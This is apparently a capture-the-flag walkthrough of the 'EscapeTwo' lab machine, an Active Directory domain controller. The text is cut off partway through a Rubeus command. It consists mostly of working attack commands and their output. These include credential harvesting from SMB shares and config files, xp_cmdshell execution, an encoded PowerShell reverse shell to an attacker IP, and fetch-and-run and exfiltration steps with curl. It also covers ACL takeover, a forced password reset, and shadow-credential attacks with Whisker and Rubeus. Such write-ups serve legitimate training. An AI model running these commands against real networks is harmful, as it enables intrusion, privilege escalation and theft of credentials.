EscapeTwo

Recon

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

Creds: rose:KxEPkKe6R8su

SMB (139/445)

└─$ netexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' -M spider_plus -o DOWNLOAD_FLAG=True
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.51     445    DC01             [*] Enumerated shares
SMB         10.10.11.51     445    DC01             Share           Permissions     Remark
SMB         10.10.11.51     445    DC01             -----           -----------     ------
SMB         10.10.11.51     445    DC01             Accounting Department READ
SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.51     445    DC01             C$                              Default share
SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.11.51     445    DC01             Users           READ
SPIDER_PLUS 10.10.11.51     445    DC01             [-] Failed to download file "Default/NTUSER.DAT.LOG2". Error: 'RemoteFile' object has no attribute 'get_filesize'
SPIDER_PLUS 10.10.11.51     445    DC01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json".
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Shares:           7 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Readable Shares:  5 (Accounting Department, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total folders found:  76
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total files found:    67
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Files filtered:       6
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size average:    23.74 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size min:        0 B
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size max:        512 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File unique exts:     15 (.xlsx, .cmtx, .blf, .inf, .zfsendtotarget, .desklink, .mapimail, .pol, .log2, .log1...)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Downloads successful: 60
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Downloads failed:     1

└─$ mv /tmp/nxc_hosted/nxc_spider_plus/10.10.11.51/ .
└─$ find . -type f | grep -ivE '(ini|lnk)$'
./Users/Default/NTUSER.DAT.LOG2
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
./Accounting Department/accounts.xlsx
./Accounting Department/accounting_2024.xlsx
./SYSVOL/sequel.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/comment.cmtx
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol

For some reason you can't open excel files?... Unzip them and read contents manually.

└─$ unzip accounting_2024.xlsx -d accounting_2024
└─$ unzip accounts.xlsx -d accounts

Searching for domain we get many results and it looks like passwords too!

First Name

Last Name

Email

Username

Password

Angela

Martin

angela@sequel.htb

angela

0fwz7Q4mSpurIt99

Oscar

Martinez

oscar@sequel.htb

oscar

86LxLBMgEWaKUnBG

Kevin

Malone

kevin@sequel.htb

kevin

Md9Wlq1E5bZnVDVo

NULL

sa@sequel.htb

MSSQLP@ssw0rd!

MSSQL (1433)

We have command execution as MSSQL server.

└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x whoami
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL       10.10.11.51     1433   DC01             [+] Executed command via mssqlexec
MSSQL       10.10.11.51     1433   DC01             sequel\sql_svc

└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA3ACIALAA0ADQANAA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
[14:42:23] ERROR    Error when attempting to execute command via xp_cmdshell: timed out 
---
└─$ listen 4445
Ncat: Connection from 10.10.11.51:50320.
PS C:\Windows\system32> whoami /all

User Name      SID
============== ============================================
sequel\sql_svc S-1-5-21-548670397-972687484-3496335370-1122

Group Name                                 Type             SID                                                             Attributes
========================================== ================ =============================================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group
SEQUEL\SQLServer2005SQLBrowserUser$DC01    Alias            S-1-5-21-548670397-972687484-3496335370-1128                    Mandatory group, Enabled by default, Enabled group, Local Group
SEQUEL\SQLRUserGroupSQLEXPRESS             Alias            S-1-5-21-548670397-972687484-3496335370-1129                    Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Reverse Shell

PS C:\Users\sql_svc\Music> curl.exe --version
curl 8.9.1 (Windows) libcurl/8.9.1 Schannel zlib/1.3 WinIDN
Release-Date: 2024-07-31
Protocols: dict file ftp ftps http https imap imaps ipfs ipns mqtt pop3 pop3s smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS HSTS HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM SPNEGO SSL SSPI threadsafe Unicode UnixSockets
PS C:\Users\sql_svc\Music> curl.exe 10.10.14.47/wp.exe -O
PS C:\Users\sql_svc\Music> .\wp.exe | tee -filepath wp.log
...
------------ Checking KrbRelayUp
-  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
  The system is inside a domain (SEQUEL) so it could be vulnerable.
- You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
------------ Logged users
    NT SERVICE\MSSQLFDLauncher$SQLEXPRESS
    NT SERVICE\SQLTELEMETRY$SQLEXPRESS
    SEQUEL\Administrator
    SEQUEL\sql_svc
    SEQUEL\ryan
...
------------ Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Public : Service [WriteData/CreateFiles]
    C:\Users\ryan
    C:\Users\sql_svc : sql_svc [AllAccess]
...
------------ Modifiable Services
- Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
    RmSvc: GenericExecute (Start/Stop)
    ConsentUxUserSvc_581e8: GenericExecute (Start/Stop)
    DevicePickerUserSvc_581e8: GenericExecute (Start/Stop)
serSvc_581e8: GenericExecute (Start/Stop)
    PimIndexMaintenanceSvc_581e8: GenericExecute (Start/Stop)
    PrintWorkflowUserSvc_581e8: GenericExecute (Start/Stop)
    UnistoreSvc_581e8: GenericExecute (Start/Stop)
    UserDataSvc_581e8: GenericExecute (Start/Stop)
    WpnUserService_581e8: GenericExecute (Start/Stop)
...

Upload SharpHound and collect data about AD

└─$ updog
[+] Serving /home/woyag/Desktop/Rooms/EscapeTwo...
---
PS C:\Users\sql_svc\Music> .\sh.exe -c all --zipfilename sh.zip
PS C:\Users\sql_svc\Music> curl.exe -v 10.10.14.97:9090/upload -F 'file=@20250111115528_sh.zip' -F 'path=/home/woyag/Desktop/Rooms/EscapeTwo'

Shortest Path to Domain Admins shows:

ryan seems to be our next target for priv esc.

Privilege Escalation (ryan)

PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

└─$ evil-winrm -i sequal.htb -u ryan -p WqSZAF6CysDQbGb3
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
User Name   SID
=========== ============================================
sequel\ryan S-1-5-21-548670397-972687484-3496335370-1114

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
SEQUEL\Management Department                Group            S-1-5-21-548670397-972687484-3496335370-1602 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\ryan> cat Desktop/user.txt
f5f6936ee23db461dbb4eeb02342dabb

Privilege Escalation (ca_svc)

(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Changing current owner S-1-5-21-548670397-972687484-3496335370-512 to S-1-5-21-548670397-972687484-3496335370-1114
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Success! modified owner for CN=Certification Authority,CN=Users,DC=sequel,DC=htb
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Add-DomainObjectAcl -PrincipalIdentity ryan -TargetIdentity ca_svc -Rights fullcontrol
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found target identity: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found principal identity: CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] Adding FullControl to S-1-5-21-548670397-972687484-3496335370-1607
[2025-01-11 16:13:23] DACL modified successfully!
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainUserPassword -Identity ca_svc -AccountPassword 'Password123$'
[2025-01-11 16:13:23] [Set-DomainUserPassword] Principal CN=Certification Authority,CN=Users,DC=sequel,DC=htb found in domain
[2025-01-11 16:13:23] [Set-DomainUserPassword] Password has been successfully changed for user ca_svc
[2025-01-11 16:13:23] Password changed for ca_svc

Note: There's like cronjob which runs every 10 second or smth, if second command fails run first and then second again.

or use bloodyAD to reset password

bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set owner ca_svc ryan
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" add genericAll ca_svc ryan
# bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set password "ca_svc" 'Password123$'

Docs: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Password reset didn't work as intended and shadow credentials also had error about Kerberos not working.

Because kerberos doesn't work from external, we can try to do the attack internally with Whisker+Rubeus Binaries: https://github.com/jakobfriedl/precompiled-binaries

└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Whisker.exe
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Rubeus.exe
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Whisker.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Rubeus.exe -O

*Evil-WinRM* PS C:\Users\ryan\Music> .\Whisker.exe add /target:ca_svc
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password JSVbHTvuGtaRz03f
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 44ed67c4-b31e-4db2-91c8-4d37c1e70bce
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:ca_svc /certificate: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 /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show

*Evil-WinRM* PS C:\Users\ryan\Music> .\Rubeus.exe asktgt /user:ca_svc /certificate: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